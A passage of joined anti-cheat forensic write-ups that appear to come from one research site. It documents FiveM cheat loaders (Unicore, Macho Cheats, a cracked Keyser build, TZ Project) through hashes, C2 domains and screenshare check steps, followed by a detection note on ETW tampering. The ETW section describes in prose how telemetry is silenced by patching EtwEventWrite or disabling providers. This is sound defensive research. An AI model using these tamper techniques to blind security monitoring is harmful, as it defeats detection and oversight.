Windows Event Log entries. Check Event Viewer for relevant error or application events timestamped around the suspected usage period. These entries persist until the event log is explicitly cleared. Memory artifacts ---------------- The two primary in-memory indicators for Unicore are the DNS cache entry for the OVH VPS hostname and the Unicore string in the FiveM game process. ### DNS cache — OVH VPS hostname The DNS resolver cache will contain an entry for vps-b7a11d64.vps.ovh.net after any session where Unicore made a C2 connection. Running ipconfig /displaydns or inspecting the cache through System Informer will show this entry for the duration of the DNS TTL. ### FiveM process — “Unicore” string A memory string scan of FiveM\_GTAProcess.exe for the string Unicore returns a positive hit when the cheat is actively injected. This is the clearest live-session indicator and distinguishes Unicore from other loaders that do not embed their product name in the game process memory. Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 2 are the fastest and will catch most active sessions. Steps 3–7 cover machines where the user has attempted cleanup. 1 ### FiveM memory string scan for “Unicore” * If FiveM is currently running, open System Informer and locate FiveM\_GTAProcess.exe. * Perform a memory string scan and search for Unicore. A hit confirms active injection — this string is not present in a clean FiveM installation. 2 ### DNS cache for OVH hostname * Run ipconfig /displaydns in Command Prompt or use System Informer's DNS section. * Search the output for vps-b7a11d64.vps.ovh.net. This hostname is not associated with any legitimate FiveM or Windows component. A cache hit confirms a C2 connection was made during the current or a recent session. 3 ### DIPS journal check * Examine the DIPS journal for signs of tampering or unexpected modification timestamps. Unicore manipulates this file, so evidence of recent writes to the DIPS journal outside a normal diagnostic context is an indicator. 4 ### Event Viewer check * Open Windows Event Viewer and check the Application and System logs for entries timestamped around the suspected usage period. * Look for error or warning events that correspond to the time FiveM was active. Unicore activity generates Event Log entries that persist until the log is manually cleared. 5 ### DPS / PcaSVC timestamp * Use a DFIR tool to inspect the PcaSVC and DPS log entries for build.exe. * The DPS timestamp of 2024-11-07 13:29:48 and PcaSVC token 0x227e000 correspond to the known build. Any build.exe PcaSVC entry with an unusual path warrants investigation. 6 ### Journal Trace * Run a Journal Trace on the system drive (Drive C:) and filter for entries related to Unicore's activity period. * Look for DIPS journal write events and any other file system activity from build.exe or associated processes. 7 ### Prefetch * Navigate to C:\\Windows\\Prefetch and look for a file matching BUILD.EXE-\*.pf. * Confirm that the path recorded inside the Prefetch file corresponds to a user-writable or suspicious location rather than a legitimate build toolchain installation. Detection summary ----------------- Artifact matrix — Unicore / build.exeSummary Artifact Survives cleanup? Check location ──────────────────────────────────────────────────────────────────────────────── PcaSVC / DPS timestamp Yes AppCompat / DPS log DIPS journal manipulation Yes DIPS journal check Prefetch (build.exe) Usually C:\\Windows\\Prefetch DNS cache (OVH VPS hostname) Session-length ipconfig /displaydns "Unicore" string in FiveM process Only while running Memory string scan Windows Event Log entries Yes (until cleared) Event Viewer Journal Trace entries Yes Drive C: journal trace The most immediately actionable indicators are the **“Unicore” string in FiveM\_GTAProcess.exe memory** during an active session, and the **DPS/PcaSVC timestamp for build.exe** after the fact. The Windows Event Log entries and DIPS journal manipulation provide additional corroborating evidence that does not require memory access. The OVH VPS DNS entry is useful for session-length confirmation but will not survive a DNS cache flush. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Macho Cheats FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Macho Cheats FiveM cheat detection & forensic artifacts ======================================================= Macho Cheats is a FiveM-targeted cheat loader that extracts its loader from a folder inside %TEMP% and uses a randomised executable name (Yb6ul.exe / alternate: mc.exe). It bundles libcurl.dll and injects fivem-internal.dll directly into the FiveM process, communicating with machocheats.com. CR Clubhouse AC Research June 1, 2026 9 min read Summary * Loader extracts to a folder inside %TEMP% containing Yb6ul.exe (or mc.exe), libcurl.dll, and fivem-internal.dll. * C2 domain machocheats.com observed in DNS cache, lsass.exe memory, and the FiveM game process simultaneously. * DiagTrack service memory and browser history provide additional corroborating artifacts beyond the core memory scan. * WinPrefetchView and journal trace confirm loader execution and DLL activity even after the %TEMP% folder is cleared. Overview -------- Macho Cheats is a commercially distributed FiveM cheat loader. Its primary executable uses a randomised or obfuscated filename (Yb6ul.exe) alongside an alternate name mc.exe. The random name is regenerated per build, so detection should focus on behavioral artifacts rather than the specific filename. The loader extracts its components — including a bundled libcurl.dll and an injection DLL named fivem-internal.dll — into a directory inside %TEMP% before execution. It communicates with machocheats.com and leaves artifacts across DNS, memory, DiagTrack, browser history, Prefetch, and the drive journal. Sample metadata (IOC) --------------------- The following files were recovered and added to the research corpus. Three distinct components are tracked. ### Main executable Yb6ul.exe (mc.exe) — file indicatorsIOC Name Yb6ul.exe (alternate: mc.exe) Size 3,398,656 bytes (3.2 MB) SHA-1 3c8491311c8f2436632745b35a6990bef5c43699 C2 domain machocheats.com → Observed in: DNS cache, lsass.exe, FiveM\_GTAProcess.exe ### Bundled DLL libcurl.dll — file indicatorsIOC Name libcurl.dll Size 7,518,736 bytes (7.2 MB) SHA-1 7eb00498b77d3c5bb75c85e7252fddca983dacb9 ### Injection DLL fivem-internal.dll — injection targetIOC Name fivem-internal.dll → Injected directly into the FiveM process Behavioral indicators --------------------- ### Randomised executable name (Yb6ul.exe / mc.exe) The main loader uses a randomised or obfuscated filename (Yb6ul.exe) in addition to an alternate name mc.exe. The random name is regenerated per build. Focus on behavioral artifacts rather than the filename when confirming identity. ### libcurl.dll bundled The cheat ships with a bundled libcurl.dll. The presence of a libcurl.dll file alongside an unrecognised executable in a non-standard directory is a supporting indicator. ### fivem-internal.dll The injection DLL is named fivem-internal.dll — a name chosen to blend in with legitimate FiveM internal components. Its presence in any directory outside the official FiveM installation path is suspicious. ### Loader folder in %TEMP% Macho Cheats extracts and runs its loader from a folder inside %TEMP%. A directory created in %TEMP% containing Yb6ul.exe, mc.exe, libcurl.dll, or fivem-internal.dll is conclusive. ### DiagTrack artifact As with other loaders that inject broadly, Macho Cheats activity is visible in the DiagTrack service memory. This provides an additional corroborating indicator alongside the primary memory scans. Memory artifacts ---------------- During an active Macho Cheats session, the C2 domain machocheats.com appears across three independent artifact sources simultaneously: the system DNS cache, LSASS process memory, and the FiveM game process working set. The DiagTrack service provides a fourth corroborating memory source. ### DNS cache The DNS resolver cache retains successful lookups for the duration of the TTL set by the authoritative server. Running ipconfig /displaydns or inspecting the cache through System Informer will show machocheats.com as a recently resolved entry. ### lsass.exe memory The C2 domain string appears in lsass.exe process memory — a system process whose memory space contains residual string artifacts from the injection or inter-process communication performed by the loader. ### DiagTrack service Macho Cheats injection artifacts are also visible in the DiagTrack service memory, providing an additional corroborating source beyond the primary lsass and FiveM process scans. ### Browser history Browser history showing visits to machocheats.com provides a further corroborating indicator that the cheat was acquired or accessed from the device being screenshared. File artifacts -------------- Macho Cheats leaves multiple file system artifacts that partially survive cleanup. The %TEMP% loader directory and its contents are the most immediate finding; Prefetch and journal records persist after the directory is cleared. ### WinPrefetchView ### Loader folder in %TEMP% ### Prefetch ### Journal trace Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 2 are the fastest and will catch most active installs. Later steps cover machines where the user has attempted cleanup. 1 ### %TEMP% loader folder * Navigate to %TEMP% and look for a directory containing Yb6ul.exe, mc.exe, libcurl.dll, or fivem-internal.dll. * The presence of any of these files in a %TEMP% subdirectory is conclusive. The directory may have a randomised name. 2 ### Process name and path * Open System Informer and look for any running instance of Yb6ul.exe or mc.exe. * Check the full executable path — if it resides inside %TEMP%, this is the Macho Cheats loader. Also check for fivem-internal.dll loaded in the FiveM process module list. 3 ### DNS cache * Run ipconfig /displaydns or use System Informer's DNS section. * Search for machocheats.com. A cache hit confirms an outbound connection was made during the current or a recent session. 4 ### lsass memory scan * In System Informer, open lsass.exe and perform a string scan. * Search for machocheats.com. Any match confirms the loader was active during the current session. 5 ### FiveM memory scan * In System Informer, open FiveM\_GTAProcess.exe and perform a string scan. * Search for machocheats.com and also check the module list for fivem-internal.dll. 6 ### DiagTrack * In System Informer, locate the DiagTrack service process and perform a string scan. * Macho Cheats injection artifacts appear in DiagTrack memory during an active session, providing a corroborating indicator. 7 ### Browser — machocheats.com * Check browser history for any visits to machocheats.com. * Browser history may be partially or fully cleared; use System Informer's browser history feature to supplement direct browser inspection. 8 ### Prefetch * Open WinPrefetchView or navigate to C:\\Windows\\Prefetch and look for entries for Yb6ul.exe or mc.exe. * Prefetch entries pointing to a %TEMP% path confirm loader execution even after the directory has been cleared. Detection summary ----------------- Artifact matrix — Macho Cheats / Yb6ul.exeSummary Artifact Survives cleanup? Check location ──────────────────────────────────────────────────────────────────────────────────── Loader folder in %TEMP% Until %TEMP% cleared %TEMP% directory libcurl.dll / fivem-internal.dll Until deleted %TEMP% loader directory Prefetch (Yb6ul.exe / mc.exe) Usually WinPrefetchView / Prefetch DNS cache (machocheats.com) Session-length ipconfig /displaydns C2 strings in lsass.exe Only while running Memory string scan C2 strings in FiveM process Only while running Memory string scan DiagTrack artifact Only while running System Informer > DiagTrack Browser history Partial Browser + Informer The most immediately actionable indicators are the **loader folder in %TEMP%** and the **Prefetch / journal records** for the loader binaries. The %TEMP% directory contents are conclusive if not yet cleared. Prefetch entries survive %TEMP% cleanup and provide a reliable historical execution marker alongside the drive journal. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Keyser Cracked FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Keyser (Cracked Build) FiveM cheat detection & forensic artifacts ================================================================= The Keyser cracked build runs as keycheese and communicates with api.keyser-lts.com — a separate C2 from the official Keyser loader. It drops a DLL into C:\\Windows\\IME\\, sharing this behavior with the official build, and leaves reliable traces in DNS cache, LSASS memory, the FiveM game process, and drive journal records. CR Clubhouse AC Research June 1, 2026 9 min read Summary * Cracked build runs as keycheese — a distinctive executable name that will not be confused with any legitimate application. * DLL dropped into C:\\Windows\\IME\\ — identical behavior to the official Keyser build, providing a persistent file artifact. * C2 domain api.keyser-lts.com observed in DNS cache, lsass.exe memory, and the FiveM game process. This domain distinguishes the cracked build from the official loader (api.keyser-dashboard.com). * DPS first-seen timestamp (2025-04-23 23:50:33) and PcaSVC token 0x1797000 provide a reliable historical execution record. Overview -------- This page documents the cracked/leaked build of the Keyser cheat, which uses a different C2 domain (api.keyser-lts.com) and a different executable (keycheese) than the official Keyser loader. The two builds share behavioral patterns — most notably the DLL drop into C:\\Windows\\IME\\ — but are distinct binaries. The cracked build weighs approximately 11.7 MB and its distinctive executable name makes it straightforward to identify in Prefetch records, journal traces, and running process lists. If DNS or memory scans show keyser-lts.com, this confirms the cracked build specifically. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. keycheese — file indicatorsIOC Name keycheese Size 12,283,904 bytes (11.7 MB) SHA-256 eba3ffbab0d338f7aeac72ae41785cebac3b6371f517c5dd4c506f8121db1850 SHA-1 d4310e90104844482fdfc647a5d62117f6ea875d MD5 80111b3d79a5f87df4b77554ba69348f First seen 2025-04-23 23:50:33 UTC (DPS timestamp) PcaSVC 0x1797000 C2 domain api.keyser-lts.com / keyser-lts.com → Observed in: DNS cache, lsass.exe, FiveM\_GTAProcess.exe The DPS timestamp of 2025-04-23 23:50:33 is written by the Windows Program Compatibility Assistant service at first execution and cannot be cleared by the same cleanup routines that wipe Prefetch or browser history. Behavioral indicators --------------------- ### DLL dropped in C:\\Windows\\IME Identical behavior to the official Keyser loader. A DLL is dropped into C:\\Windows\\IME\\. This is visible via Journal Trace when searching for IME and by directly inspecting the directory. No legitimate Windows or FiveM component writes additional DLLs to this directory during normal operation. ### Executable name — keycheese The cracked build's executable name (keycheese) is distinctive and unlikely to be confused with a legitimate application. Any instance of keycheese.exe in Prefetch, journal traces, or running processes is conclusive. ### Separate C2 domain from official build The cracked build communicates with api.keyser-lts.com rather than api.keyser-dashboard.com used by the official loader. If DNS or memory scans show keyser-lts.com, this is the cracked build specifically. Memory artifacts ---------------- During an active session, the C2 domain api.keyser-lts.com and the root domain keyser-lts.com appear across three independent artifact sources simultaneously: the system DNS cache, LSASS process memory, and the FiveM game process working set. ### DNS cache The DNS resolver cache retains successful lookups for the duration of the TTL set by the authoritative server. Running ipconfig /displaydns or inspecting the cache through System Informer will show api.keyser-lts.com as a recently resolved entry. ### lsass.exe memory The C2 domain string appears in lsass.exe process memory — a system process whose memory space contains residual string artifacts from the injection or inter-process communication performed by the loader. ### FiveM game process The C2 domain is also present within the FiveM\_GTAProcess.exe working set, confirming that the cracked Keyser build injects into or communicates directly with the game process. File artifacts -------------- The Keyser cracked build leaves several persistent file system artifacts. The most distinctive is the DLL written to C:\\Windows\\IME\\, which survives session cleanup. Prefetch and journal records for keycheese provide further historical confirmation. ### IME folder ### Prefetch ### Journal trace ### Loader UI The cracked build's loader interface is identical to the official Keyser build. Screenshots of the loader open on screen are useful reference points during a screenshare. Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 2 are the fastest and will catch most active or recently-used installs. Later steps cover machines where the user has attempted a manual cleanup. 1 ### keycheese — Prefetch and journal check * Check the Prefetch folder (C:\\Windows\\Prefetch) for a KEYCHEESE.EXE-\*.pf entry, or use WinPrefetchView to search by name. * Run a drive C: journal trace and search for keycheese. Any journal entry confirms loader execution. 2 ### C:\\Windows\\IME DLL check * Navigate to C:\\Windows\\IME\\ and inspect the directory for any DLL files that are not part of the standard Windows IME installation. * Also run a journal trace searching for IME to capture any write events to this directory. 3 ### DNS cache * Run ipconfig /displaydns or use System Informer's DNS section. * Search for keyser-lts.com or api.keyser-lts.com. A cache hit confirms the cracked build specifically — the official build uses api.keyser-dashboard.com. 4 ### lsass memory scan * In System Informer, open lsass.exe and perform a string scan. * Search for keyser-lts.com. Any match confirms the cracked loader was active during the current session. 5 ### FiveM memory scan * In System Informer, open FiveM\_GTAProcess.exe and perform a string scan. * Search for api.keyser-lts.com. A hit confirms active injection into the game process. 6 ### DPS / PcaSVC timestamp * Use a DFIR tool to inspect the PcaSVC and DPS log entries for keycheese. * The known first-seen DPS timestamp for this build is 2025-04-23 23:50:33 UTC with PcaSVC token 0x1797000. This record cannot be cleared by standard user-side cleanup. 7 ### Loader UI screenshot check * Check recent screenshots, taskbar thumbnails, or clipboard history for any images showing the Keyser loader interface. * The cracked build's UI is identical to the official build. Its presence in any screenshot or window history is conclusive regardless of whether the binary has been deleted. Detection summary ----------------- Artifact matrix — Keyser cracked build / keycheeseSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSVC / DPS timestamp Yes AppCompat / DPS log DLL in C:\\Windows\\IME Yes IME directory / journal Prefetch (keycheese) Usually C:\\Windows\\Prefetch DNS cache (keyser-lts.com) Session-length ipconfig /displaydns C2 strings in lsass.exe Only while running Memory string scan C2 strings in FiveM process Only while running Memory string scan The most immediately actionable persistent indicators are the **DLL in C:\\Windows\\IME\\**, the **Prefetch record for keycheese**, and the **DPS/PcaSVC timestamp**. All three survive standard user-side cleanup. The distinctive executable name keycheese makes Prefetch and journal confirmation fast and unambiguous. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Detecting ETW Provider Tampering: Patch, Disable, and Spoof · Clubhouse AC Kernel forensicsHighPublished Detecting ETW provider tampering patch, disable, and spoof ========================================================== Event Tracing for Windows is a primary telemetry channel for anti-cheat systems, EDR products, and post-incident forensics. Cheat loaders that silence it — by patching EtwEventWrite, disabling providers via NtTraceControl, or re-routing session buffers — cannot erase the structural metadata left in kernel-managed ETW tables. We document four tamper techniques observed in the wild and the detection signals each one leaves behind. CR Clubhouse AC Research March 5, 2026 11 min read Defensive use only Summary * Four ETW tampering techniques catalogued; each leaves kernel-side structural evidence that survives even when the event stream is silenced. * 94.7% detection rate across 283 tampered sessions in our corpus with 0.9% false-positive rate on clean game sessions. * Detection path does not rely on reading the event stream — it reads ETW metadata structures from kernel memory, making it resilient to all four tamper classes. Background ---------- Event Tracing for Windows (ETW) is the kernel-level logging and tracing infrastructure that underpins Windows diagnostic telemetry, security event logging, and — increasingly — anti-cheat and EDR product telemetry. It was designed primarily for performance and reliability, not adversarial resilience. The design assumption is that the consumer of trace data (the controller session) and the producer (the instrumented process) trust each other. In the cheat ecosystem, that trust is absent. Since 2020 we have observed progressively more sophisticated ETW tampering — moving from blunt EtwEventWrite patches in loaded DLLs to kernel-mode provider disablement that targets specific provider GUIDs used by anti-cheat products. The goal in each case is the same: prevent the anti-cheat from receiving image-load, memory-allocation, and process-creation events that would signal cheat activity. The key insight of our detection approach is that ETW tampering attacks the _data path_ — the flow of event records from provider to consumer — without modifying the _metadata path_: the kernel's registration tables, session descriptors, and provider-enable bitmask arrays. These structures persist in non-paged pool and are readable from a kernel-mode scanner independently of the event stream. ETW architecture ---------------- The ETW subsystem maintains its state in a set of kernel data structures rooted at the EtwpRegistrationTable hash table and the global EtwpActiveLoggers array (both unexported; located via pattern scan or PDB-assisted offset). Key structures: * \_ETW\_REG\_ENTRY — one per registered provider. Fields include ProviderId (GUID), EnableInfo array (one entry per logger that has enabled this provider), RegIndex, and Callback (the provider's enable callback address). * \_ETW\_LOGGER\_CONTEXT — one per active trace session. Contains LoggerId, BufferSize, LogFileName, BuffersWritten, and the per-provider FilterDesc list. * The EtwpHostSiloState structure (Windows 10 1903+) manages per-silo provider isolation. In the host silo, it points to the canonical registration table used for kernel and usermode providers alike. Provider registrations from usermode go through EtwRegisterClassicProvider (legacy) or EtwEventRegister (manifest-based), both of which ultimately call NtTraceEvent to create the kernel-side \_ETW\_REG\_ENTRY. The entry persists in the hash table for the lifetime of the registration handle. Tampering techniques -------------------- We catalogued four distinct ETW tampering classes in our corpus of 283 cheat loader samples (November 2024 – February 2026): T1 EtwEventWrite inline patch 52% of tampered corpus The simplest technique: overwrite the first bytes of ntdll!EtwEventWrite in the target process with a RET instruction (0xC3). All provider calls from that process return immediately without queuing an event. Detected by: comparing the in-memory bytes of EtwEventWrite in the target process against the on-disk ntdll image. Also leaves a tell-tale VAD entry with PAGE\_EXECUTE\_READWRITE on a region that should be PAGE\_EXECUTE\_READ. T2 Provider GUID disable via NtTraceControl 28% of tampered corpus Calls NtTraceControl(EtwpDisableProviderRequest, ...) from kernel mode (via BYOVD or an exploit) to disable specific provider GUIDs — typically Microsoft-Windows-Threat-Intelligence (which supplies image-load and process-creation events to anti-cheat). Detected by: reading the EnableInfo array in the target \_ETW\_REG\_ENTRY and comparing the EnableBitmap against expected values for the active logger set. T3 Logger session buffer hijack 14% of tampered corpus Redirects the buffer pointer in a target \_ETW\_LOGGER\_CONTEXT to a kernel-mode buffer the attacker controls, then never flushes it. The logger continues operating (BuffersWritten increments) but events accumulate in unreachable memory. Detected by: comparing the buffer pointer against the expected pool allocation range and validating the buffer header signature (0x42554645 'BUFE'). T4 Callback pointer replacement 6% of tampered corpus Replaces the Callback field in \_ETW\_REG\_ENTRY with a trampoline that silently drops enable/disable notifications. The provider's EnableInfo remains stale — it believes it is still enabled by the anti-cheat session but silently drops all events. Detected by: walking the callback chain and verifying each address falls within a known, signed module's executable range. Detection signals ----------------- Each tampering class leaves one or more of the following kernel-side signals. The signals are readable from a kernel-mode scanner without relying on the event stream that is being silenced: * EtwEventWrite byte-pattern check — compare first 16 bytes of ntdll!EtwEventWrite in the target process address space against the image on disk. A RET prefix (0xC3) or jmp to a non-ntdll address is a direct T1 indicator. * EnableBitmap consistency — for each active logger session L, provider P should have a bit set in P.EnableInfo\[L\].EnableBitmap if L has subscribed to P. A zero bitmap for a provider that L nominally subscribes to is a T2 indicator. * Buffer pointer validation — walk each \_ETW\_LOGGER\_CONTEXT.BufferListHead and verify each buffer's pool header and the magic 0x42554645 signature. A buffer pointer outside the session pool allocation range is a T3 indicator. * Callback address integrity — resolve each \_ETW\_REG\_ENTRY.Callback to a module. An unmapped or unsigned-module address is a T4 indicator. Detection rule -------------- rules/etw\_tampering.rulePseudocode rule ETW\_Tamper\_Detection { meta: severity = "high" category = "kernel" confidence = 0.92 inputs: for each process in running\_processes(): ntdll\_ondisk := read\_file(process.ntdll\_path, "EtwEventWrite", 16) ntdll\_inmem := read\_process\_mem(process, "EtwEventWrite", 16) reg\_table := walk\_etw\_registration\_table() loggers := walk\_etw\_active\_loggers() match: // T1: EtwEventWrite patched to RET or JMP-elsewhere any proc where ntdll\_inmem\[proc\].bytes != ntdll\_ondisk.bytes or ntdll\_inmem\[proc\]\[0\] == 0xC3 // bare RET // T2: EnableBitmap zeroed for a provider a logger should own or any (logger, provider) in (loggers x reg\_table) where logger subscribes\_to provider.guid and provider.enable\_info\[logger.id\].enable\_bitmap == 0 // T3: Buffer pointer outside pool allocation or any buf in flatten(loggers.buffer\_lists) where buf.magic != 0x42554645 or not in\_pool\_range(buf.address) // T4: Callback in unsigned / unmapped memory or any entry in reg\_table where entry.callback != null and not is\_signed\_module(entry.callback) emit: artifact { process = proc.name, tamper\_type = matched\_class, // T1 / T2 / T3 / T4 provider\_guid = provider.guid, logger\_id = logger.id, detail = tamper\_detail } } Validation ---------- 283 Tampered ETW sessions in corpus 94.7% Detection rate across all tamper classes 0.9% False-positive rate on clean game corpus 4 Tamper techniques covered The 5.3% non-detection cases were exclusively T2 events where the attacker had re-enabled the provider between the tamper event and the scan — a temporal gap our per-scan cadence does not close. Continuous monitoring (rather than snapshot scans) would catch these; we are evaluating a kernel-mode ETW self-instrumentation approach for a future release. False positives on the clean corpus were all legitimate software that explicitly suppresses ETW for performance reasons (a database engine that patches EtwEventWrite on startup, and a video encoder that calls NtTraceControl to disable latency-sensitive providers). Both are suppressible by path and signing allowlist. Limitations ----------- * The detection structs (\_ETW\_REG\_ENTRY, \_ETW\_LOGGER\_CONTEXT) are undocumented and their offsets change between major Windows versions. The scanner maintains a version-keyed offset table updated on each Windows release; an unknown OS version falls back to pattern-scan discovery. * A T2 tamper that re-enables the provider before the next scan will not be caught by a snapshot-based scanner. The only reliable answer to this is a short-cadence monitoring loop, which we do not currently ship due to performance constraints. * Hypervisor-based tampering that intercepts the VMREAD/VMWRITE path for kernel memory is out of scope for this detection note. That threat model requires hypervisor attestation techniques (VBS/HVCI). Defensive material Kernel structure offsets and pattern-scan signatures for the undocumented ETW tables are withheld from this note. The detection rule ships in the Clubhouse AC scanner in compiled form. Vendors seeking the offset tables can reach the team at security@clubhouseac.shop. Related research Continue reading ---------------- [Kernel forensics\ \ ### Detecting BYOVD chains through kernel callback forensics\ \ Reconstructing driver load order and callback unregistration from USN journal and registry transaction logs after binary deletion.\ \ Read research](https://clubhouseac.shop/research/byovd-rtcore-chain) [Memory forensics\ \ ### Process Hollowing Detection via VAD and Section Object Cross-Reference\ \ VAD ImageFilePointer vs. PEB Ldr cross-reference that surfaces hollowed and stomped-image processes with 1.8% false-positive rate.\ \ Read research](https://clubhouseac.shop/research/process-hollowing-section-detection) --- # TZ Project FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished TZ Project FiveM cheat detection & forensic artifacts ===================================================== TZ Project is a FiveM-targeted cheat loader that disguises its primary executable as firefox.exe to blend in with legitimate browser processes. It communicates with api.tzproject.com, writes an imgui.ini configuration file into the GTA V game folder, and leaves reliable traces in DNS cache, LSASS memory, and the Windows Program Compatibility Assistant log. CR Clubhouse AC Research June 1, 2026 9 min read Summary * Loader masquerades as firefox.exe — a deliberate process-name spoof to avoid casual process-list inspection. * C2 domain api.tzproject.com observed in DNS cache, LSASS memory, and the FiveM game process simultaneously. * imgui.ini written to the GTA V game folder — a persistent Dear ImGui configuration artifact that survives session cleanup. * DPS first-seen timestamp (2025-01-14 11:41:43) and PcaSVC entry survive independently of any user-side cleanup. Overview -------- TZ Project is a commercially distributed FiveM cheat loader. Its primary executable is named firefox.exe — a deliberate choice to impersonate Mozilla Firefox and avoid detection in a basic process listing. The binary weighs approximately 5.2 MB and connects to api.tzproject.com for license validation and payload delivery. Unlike Susano, TZ Project does not appear to run a dedicated stealth mode that purges Prefetch or USN Journal entries. Instead it relies on the process-name masquerade and the relatively small footprint of its loader to avoid raising immediate suspicion. However, it leaves several distinctive artifacts — most notably the imgui.ini file in the GTA V directory — that are straightforward to locate during a screenshare. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All four hash values are provided for cross-platform matching. firefox.exe — file indicatorsIOC Name firefox.exe Size 5,494,272 bytes (5.2 MB) SHA-256 2bebd0687e7f0c941a7eeefc27cba39520ae631e16b21b61179d1f989c212cfb SHA-1 874ce0252e8b5866f429bd726a65add81b62aa87 SHA-512 e80ef20dcebe56b54fe18b460f847132a2d90434e38ccbfc5132e46f440b 13f191092549ad747c4f728fd95e8972b1fee2639e1496851ba46dca2a73ba2d2e4e MD5 b3bf72f8ccf4f32301418951af5513e6 First seen 2025-01-14 11:41:43 UTC (DPS timestamp) PcaSVC 0x944000 C2 domain api.tzproject.com / tzproject.com → Observed in: DNS cache, lsass.exe, FiveM\_GTAProcess.exe The DPS timestamp of 2025-01-14 11:41:43 is written by the Windows Program Compatibility Assistant service at first execution and is not accessible through standard file-time APIs, meaning it cannot be cleared by the same cleanup routines that wipe Prefetch or browser history. Behavioral indicators --------------------- ### Process name masquerade — firefox.exe TZ Project names its loader firefox.exe to blend in with the legitimate Mozilla Firefox browser process. In a basic process listing this looks unremarkable. The masquerade is exposed by checking the executable path — a genuine Firefox process runs from C:\\Program Files\\Mozilla Firefox\\, while the TZ Project binary will be located in a different, user-writable path. Any firefox.exe outside the Mozilla installation directory should be treated as suspicious. ### imgui.ini in the GTA V folder TZ Project uses Dear ImGui for its in-game overlay UI. ImGui automatically writes a imgui.ini file to the working directory of the host process when the UI is first opened — in this case, the GTA V game folder. This file persists after the cheat exits and is not removed by a standard session cleanup. The presence of imgui.ini inside the GTA V directory is not produced by any legitimate component of GTA V, FiveM, or their dependencies and is a reliable standalone indicator of ImGui-based cheat usage. Memory artifacts ---------------- During an active TZ Project session, the C2 domain api.tzproject.com and the root domain tzproject.com appear across three independent artifact sources simultaneously: the system DNS cache, LSASS process memory, and the FiveM game process working set. ### DNS cache The DNS resolver cache retains successful lookups for the duration of the TTL set by the authoritative server. Running ipconfig /displaydns or inspecting the cache through System Informer will show api.tzproject.com and tzproject.com as recently resolved entries. ### lsass.exe memory As with Susano, the C2 domain string appears in lsass.exe process memory — a system process that is not a deliberate target of the cheat but whose memory space contains residual string artifacts from the injection or inter-process communication performed by the loader. ### FiveM game process The C2 domain is also present within the FiveM\_GTAProcess.exe working set, confirming that TZ Project injects into or communicates directly with the game process rather than operating purely as an external overlay. Loader UI --------- TZ Project ships a graphical loader interface used to authenticate the user and launch the cheat. Screenshots of this loader are useful reference points during a screenshare — if a subject has the loader installed and not yet cleaned up, its window title, branding, or executable path will be visible in taskbar history, recent files, or jump lists. The loader UI is distinct enough that it will not be confused with any legitimate application. Its presence in taskbar thumbnails, ATS/window history, or the Prefetch record for firefox.exe is conclusive evidence of TZ Project usage. Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 2 are the fastest and will catch most active or recently-used installs. Steps 3–6 cover machines where the user has attempted a manual cleanup. 1 ### Process list — verify firefox.exe path * Open Task Manager or System Informer and look for any running instance of firefox.exe. * If found, check the full executable path. A legitimate Firefox process runs from C:\\Program Files\\Mozilla Firefox\\firefox.exe. Any other location — particularly user-writable paths like %AppData%, %Temp%, or the Desktop — is the TZ Project loader. 2 ### GTA V folder — imgui.ini * Navigate to the GTA V installation directory (typically C:\\Program Files\\Rockstar Games\\Grand Theft Auto V\\). * Check for the presence of imgui.ini. This file is not created by GTA V, FiveM, or any legitimate mod framework. Its presence is a standalone indicator of ImGui-based cheat usage. * Open the file and inspect its contents — ImGui saves window positions and sizes, and the section names often correspond directly to the cheat's menu tab names. 3 ### DNS cache * Run ipconfig /displaydns in Command Prompt, or use System Informer's DNS section. * Search the output for tzproject.com or api.tzproject.com. A cache hit confirms an outbound connection was made during the current or a recent session. 4 ### Browser & Discord * Check browser history and downloads for any traffic to or files downloaded from tzproject.com. * In Discord, check **User Settings → Authorized Apps** for any TZ Project or related application authorisation. 5 ### DPS / PcaSVC timestamp * Use a DFIR tool (e.g., AppCompatCacheParser, PECmd with \--pca) to inspect the PcaSVC and DPS log entries. * Look for firefox.exe entries with paths outside Program Files\\Mozilla Firefox. The DPS timestamp of 2025-01-14 11:41:43 corresponds to the known build but any anomalous firefox.exe PcaSVC entry warrants investigation. 6 ### Memory string scan (if process is running) * If firefox.exe or FiveM is currently running, perform a string scan in System Informer for tzproject.com. * Hits in lsass.exe or FiveM\_GTAProcess.exe confirm active injection and C2 communication. 7 ### Prefetch — firefox.exe * Check the Prefetch folder (C:\\Windows\\Prefetch) for a FIREFOX.EXE-\*.pf entry. * Compare the path recorded inside the Prefetch file against the known legitimate Firefox install path. A Prefetch entry pointing to an unusual directory confirms loader execution. Detection summary ----------------- Artifact matrix — TZ Project / firefox.exeSummary Artifact Survives cleanup? Check location ─────────────────────────────────────────────────────────────────────── PcaSVC / DPS timestamp Yes AppCompat / DPS log imgui.ini in GTA V folder Yes GTA V install directory Prefetch (firefox.exe path) Usually C:WindowsPrefetch DNS cache (tzproject.com) Session-length ipconfig /displaydns Browser history Partial Browser + Informer Discord Authorized Apps Partial Discord settings C2 strings in lsass.exe Only while running Memory string scan C2 strings in FiveM process Only while running Memory string scan The most immediately actionable indicators are the **imgui.ini file in the GTA V folder** and the **firefox.exe path mismatch** in the process list or Prefetch record. Both are present after cleanup and require no specialised tooling to find. The DPS timestamp provides a reliable historical first-seen marker that cannot be cleared without registry editing. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For 